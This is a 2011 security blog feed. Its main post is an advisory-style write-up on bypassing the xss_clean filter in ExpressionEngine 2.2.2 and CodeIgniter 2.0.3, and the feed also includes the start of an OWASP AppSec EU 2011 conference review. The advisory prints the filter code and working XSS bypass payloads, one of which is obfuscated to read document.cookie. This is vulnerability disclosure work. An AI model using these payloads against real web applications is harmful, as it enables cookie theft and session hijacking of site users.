tag:blogger.com,1999:blog-37804477113939064952024-03-19T05:10:43.987-07:00Secure.App.DevSecure Application Development & TestingMarian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.comBlogger5125tag:blogger.com,1999:blog-3780447711393906495.post-48759218817531393822011-11-27T11:26:00.000-08:002011-11-28T15:38:54.261-08:00EllisLab xss_clean Filter Bypass - ExpressionEngine and CodeIgniter<span style="font-size:100%;"><span style="font-family:arial;"><br /><br />EllisLab ExpressionEngine 2.2.2 (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://expressionengine.com/">http://expressionengine.com</a>) and CodeIgniter 2.0.3 (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://codeigniter.com/">http://codeigniter.com</a>) were recently found vulnerable to XSS attacks (<a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-013">MVSA_11_013</a>). Due to design&implementation flaws affecting CI_Security class, the built-in XSS protection provided by xss_clean filter can be easily bypassed as detailed below.</span></span><span style=";font-family:arial;font-size:100%;" ><br /></span><br /><span style=";font-family:arial;font-size:100%;" ><span style="font-family:arial;">Successful bypass of xss_clean filter was shown on a custom PHP application built using CodeIgniter PHP framework version 2.0.3. No user input validation rules were implemented/enabled, and global_xss_filtering was set to TRUE.</span><br /><br /></span><span style="font-family:arial;">Test environment: Apache HTTP Server 2.2.16, PHP 5.3.3, MySql 5.1.49</span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br /><span style="font-weight: bold;">1. 
_remove_evil_attributes function flaw</span>s<br /><br /></span><span style="font-family:arial;">As implemented for ExpressionEngine 2.2.2 and CodeIgniter 2.0.3, _remove_evil_attributes function of CI_Security class allows detection and removal of 'evil' on* event attributes (e.g. onmouseover, onfocus, etc) from any HTML tag submitted as a parameter of GET or POST requests. In most of the cases, this works fine - except when it doesn't, as detailed below</span><span style=";font-family:arial;font-size:100%;" ><br /><br /><span style="font-weight: bold;">1.1 on* event attributes submitted outside an HTML tag are not filtered out</span><br /><br /><br /><span style="font-weight: bold;">1.2 on* event attributes submitted as part of an HTML tag are removed</span><br /><br /><br /></span> <span style="color: rgb(102, 102, 102);font-family:arial;" >XSS payload: <a href=”#” onclick=”alert(1)”></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><br /><br /><span style="color: rgb(102, 102, 102);"><span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="blsp-spelling-error" id="SPELLING_ERROR_21"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean filtered output: <a href=”#”></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br />Thus, the 'evil' on* event attribute is removed from the HTML tag containing it. 
However, the character preceding the on* event attribute is also removed, which leads to crafting the following payload:<br /><br /><br /><span style="color: rgb(102, 102, 102);"><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="blsp-spelling-error" id="SPELLING_ERROR_24"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >XSS payload: <a href=”#”onclick=”alert(1)”></span><br /><br /><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean filtered output: <a href=”#></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><br />When there is no space between the value of a previous attribute (enclosed by double_quotes) and the injected on*event attribute, the double quotes closing the value of preceding<br />attribute (<span class="blsp-spelling-error" id="SPELLING_ERROR_31"><span class="blsp-spelling-error" id="SPELLING_ERROR_31"></span></span></span><span style="font-family:arial;">href i</span><span style=";font-family:arial;font-size:100%;" >n our example) is removed together with the 'evil' on* attribute.<br /><br /><br /><span style="font-weight: bold;">2. 
</span></span><span style="font-weight: bold;font-family:arial;" >xss</span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold;">_clean function flaw</span><br /><br /><span style="font-weight: bold;">2.1 unsafe usage of HTML entities</span><br /><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_33"><span class="blsp-spelling-error" id="SPELLING_ERROR_33"></span></span></span><span style="font-family:arial;">xss</span><span style=";font-family:arial;font-size:100%;" >_clean function includes functionality to replace any detected ( and ) characters with the corresponding HTML entities, as shown below:<br /><br /><br /><span style="color: rgb(102, 102, 102);">-- code from </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">_clean function </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >EE </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><span style="color: rgb(102, 102, 102);font-family:arial;" >2</span>.2.2 / CI 2.0.3 - start --</span><br /><span style="color: rgb(102, 102, 102);">/*</span><br /><span style="color: rgb(102, 102, 102);"> * Sanitize naughty scripting elements</span><br /><span style="color: rgb(102, 102, 102);"> *</span><br /><span style="color: rgb(102, 102, 102);"> * Similar to above, only instead of looking for</span><br /><span style="color: rgb(102, 102, 102);"> * tags it looks for </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >PHP </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">and JavaScript commands</span><br /><span style="color: rgb(102, 102, 102);"> * that are disallowed. 
Rather than removing the</span><br /><span style="color: rgb(102, 102, 102);"> * code, it simply converts the parenthesis to entities</span><br /><span style="color: rgb(102, 102, 102);"> * rendering the code </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >un</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">-executable.</span><br /><span style="color: rgb(102, 102, 102);"> *</span><br /><span style="color: rgb(102, 102, 102);"> * For example: </span></span><span style="color: rgb(102, 102, 102);font-family:arial;" > eval</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">('some code')</span><br /><span style="color: rgb(102, 102, 102);"> * Becomes: </span></span><span style="font-family:arial;"> eval</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">('some code')</span><br /><span style="color: rgb(102, 102, 102);"> */</span><br /><span style="color: rgb(102, 102, 102);"> $<span class="blsp-spelling-error" id="SPELLING_ERROR_40"><span class="blsp-spelling-error" id="SPELLING_ERROR_40"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >str = preg</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">_replace('#(alert|<span class="blsp-spelling-error" id="SPELLING_ERROR_42"><span class="blsp-spelling-error" id="SPELLING_ERROR_42"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si', "\\1\\2(\\3)", $str</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">);</span><br /><br /><span style="color: rgb(102, 102, 102);">-- code from <span class="blsp-spelling-error" id="SPELLING_ERROR_50"><span class="blsp-spelling-error" 
id="SPELLING_ERROR_50"></span></span></span></span><span style="color: rgb(102, 102, 102);font-family:arial;" >xss_clean function EE </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">2.2.2 / CI 2.0.3 - end --</span><br /><br /><br />This works fine when the code to be sanitised (e.g. alert(), event(), etc) is not located as part of any attribute (including on* event attributes) of the HTML tag (e.g. </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >script> alert&#40;0&#41; </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >/script>).<br /><br />When the code to be sanitised is part of an attribute of an HTML tag (e.g. </span><span style="font-family:arial;"><</span><span style=";font-family:arial;font-size:100%;" >;img onmouseover</span><span style=";font-family:arial;font-size:100%;" ><span class="blsp-spelling-error" id="SPELLING_ERROR_56"><span class="blsp-spelling-error" id="SPELLING_ERROR_56"></span></span>="alert</span><span style=";font-family:arial;font-size:100%;" >&#40;</span><span style=";font-family:arial;font-size:100%;" >111</span><span style=";font-family:arial;font-size:100%;" >&#41;</span><span style=";font-family:arial;font-size:100%;" >">), the CI_Security code above does little (if anything) to protect against XSS attacks.<br /><br /><br /><span style="font-weight: bold;">Putting it all together</span><br /><br />When we combine the flaws detailed in sections 1 and 2, we can successfully bypass XSS filtering provided by xss_clean function, as shown below.<br /><br /><span style="color: rgb(102, 102, 102);"><br />XSS payload: </span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"></span></span><span style=";font-family:arial;font-size:100%;" ><span 
style="color: rgb(102, 102, 102);">a href="#"onclick="alert(1)"</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">" onclick="alert(2)"</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">>aa</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">/a</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><br /><span style="color: rgb(102, 102, 102);"><br />xss_clean 'filtered' output: </span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">a href="#</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">" onclick="alert</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&#40;</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">2</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&#41;</span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">">aa</span></span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);"><</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 
102);">/a</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" ><span style="color: rgb(102, 102, 102);">></span></span><span style=";font-family:arial;font-size:100%;" ><br /><br /><span style=";font-family:arial;font-size:100%;" >Exploitation of the above flaws also allowed bypassing additional XSS prevention rules provided by xss_clean filter, including the usage of document.cookie as part of injected XSS payloads:<br /><br /><br /><span style="color: rgb(102, 102, 102);font-family:arial;" >... </span></span></span><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:trackmoves/> <w:trackformatting/> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:donotpromoteqf/> <w:lidthemeother>EN-GB</w:LidThemeOther> <w:lidthemeasian>X-NONE</w:LidThemeAsian> <w:lidthemecomplexscript>X-NONE</w:LidThemeComplexScript> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> <w:splitpgbreakandparamark/> <w:dontvertaligncellwithsp/> <w:dontbreakconstrainedforcedtables/> <w:dontvertalignintxbx/> <w:word11kerningpairs/> <w:cachedcolbalance/> </w:Compatibility> <w:donotoptimizeforbrowser/> <m:mathpr> <m:mathfont val="Cambria Math"> <m:brkbin val="before"> <m:brkbinsub val="--"> <m:smallfrac val="off"> <m:dispdef/> <m:lmargin val="0"> <m:rmargin val="0"> <m:defjc val="centerGroup"> <m:wrapindent val="1440"> <m:intlim val="subSup"> <m:narylim val="undOvr"> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"> <w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" 
name="Normal"> <w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"> <w:lsdexception locked="false" priority="39" name="toc 1"> <w:lsdexception locked="false" priority="39" name="toc 2"> <w:lsdexception locked="false" priority="39" name="toc 3"> <w:lsdexception locked="false" priority="39" name="toc 4"> <w:lsdexception locked="false" priority="39" name="toc 5"> <w:lsdexception locked="false" priority="39" name="toc 6"> <w:lsdexception locked="false" priority="39" name="toc 7"> <w:lsdexception locked="false" priority="39" name="toc 8"> <w:lsdexception locked="false" priority="39" name="toc 9"> <w:lsdexception locked="false" priority="35" qformat="true" name="caption"> <w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"> <w:lsdexception locked="false" priority="1" name="Default Paragraph Font"> <w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"> <w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"> <w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"> <w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" 
name="Table Grid"> <w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"> <w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"> <w:lsdexception 
locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"> <w:lsdexception locked="false" unhidewhenused="false" name="Revision"> <w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"> <w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"> <w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"> <w:lsdexception locked="false" 
priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"> <w:lsdexception 
locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"> 
<w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 
Accent 5"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful 
List Accent 6"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"> <w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"> <w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"> <w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"> <w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"> <w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"> <w:lsdexception locked="false" priority="37" name="Bibliography"> <w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} </style> <![endif]--><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >onmouseover="var a=eval</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x28'do'+'cument'+'.'+'coo'+'kie'</span></span><span style="color: 
rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x29;;alert</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x28;a</span></span><span style="color: rgb(102, 102, 102);font-family:arial;font-size:100%;" >&</span><span style="font-size:100%;"><span style="color: rgb(102, 102, 102);font-family:arial;font-size:11pt;" >#x29;" </span></span><br /><span style=";font-family:arial;font-size:100%;" ><span style=";font-family:arial;font-size:100%;" ><br />Additionally, exploitation of the flaws identified in xss_clean filter allowed compromising the provided CSRF protection as well.<br /><br />Based on the feedback I received from </span></span><span style=";font-family:arial;font-size:100%;" >EllisLab </span><span style=";font-family:arial;font-size:100%;" >on this matters</span><span style=";font-family:arial;font-size:100%;" >, improved xss_clean filtering</span><span style=";font-family:arial;font-size:100%;" > is provided in the latest versions of </span><span style=";font-family:arial;font-size:100%;" >ExpressionEngine </span><span style=";font-family:arial;font-size:100%;" >and </span><span style=";font-family:arial;font-size:100%;" >CodeIgniter </span><span style=";font-family:arial;font-size:100%;" ><span style=";font-family:arial;font-size:100%;" >products.</span><br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com18tag:blogger.com,1999:blog-3780447711393906495.post-53651694758863488072011-06-12T12:38:00.000-07:002011-11-27T14:10:28.734-08:00OWASP AppSec EU 2011<span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />OWASP AppSec EU 2011 (<a style="font-weight: bold;" 
href="http://appseceu.org/">http://appseceu.org</a>) was held in Dublin, Ireland between 7th and 10th of June. With a great selection of international presenters and with a good mix of IS professionals and developers, I can say (and I am not the only one) the conference was a success.<br /><br />As for any major AppSec event, there is only a limited number of events you can effectively participate in. Of the Defend, Prevent and Attack series of presentations, I followed the latter, as briefly summarized below.<br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><strong><strong><br /><span style="font-weight: bold;">Designing, Building and Testing Secure Application on Mobile Devices </span></strong></strong>training session held by Dan Cornell from Denim Group on 8th of June was a great introduction to security for mobile and smartphone applications. Dan introduced a threat model for smartphone applications which was used to analyze the security of iOS and Android applications. A variety of open source tools were used as part of the hands-on application analysis. While the course introduced techniques for analyzing mobile applications, it also provided recommendations on avoiding known security issues as part of the development of new smartphone applications. I guess there were not many design considerations discussed; this might be included in the next version of the course. Overall, an excellent course which will hopefully contribute to an increased awareness on building secure smartphone applications. Highly recommended.<br /><br />The plenary sessions started on 9th of June. Brad Arkin, senior director of product security and privacy at Adobe, opened the session by presenting on various aspects of Adobe's security program - <span style="font-weight: bold;">The Adobe Security Product Lifecycle</span>. 
An interesting presentation, especially on the green/brown/black belt approach to certifying expertise of security engineers, and their responsibilities inside the company.<br /><br />While I was looking forward to the first session of presentations (including Practical Browser Sandboxing on Windows with Chromium and Building a Robust Security Plan), I took the opportunity instead to catch up with some of the conference organizers (Eoin Keary and Fabio Cerullo), as well as having a quick chat with Tom Brennan about the <a href="https://www.owasp.org/index.php/OWASP_Security_Baseline_Project"><span style="font-weight: bold;">OWASP Security Baseline</span></a> </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >project (details available below).</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />Back in the presentation room for the Attack track, Joe Basirico from Security Innovation had an entertaining presentation on Web application fuzzing - <span style="font-weight: bold;">The Buzz About Fuzz: an enhanced approach to finding vulnerabilities</span>. Pros and cons of common automated testing for Web applications were discussed, as well as the benefits of fuzz testing. A very well presented topic, with practical examples and testing tools.<br /><br />Giles Hogben, secure services programme manager at ENISA, discussed information risks, opportunities and recommendations for smartphone security - <span 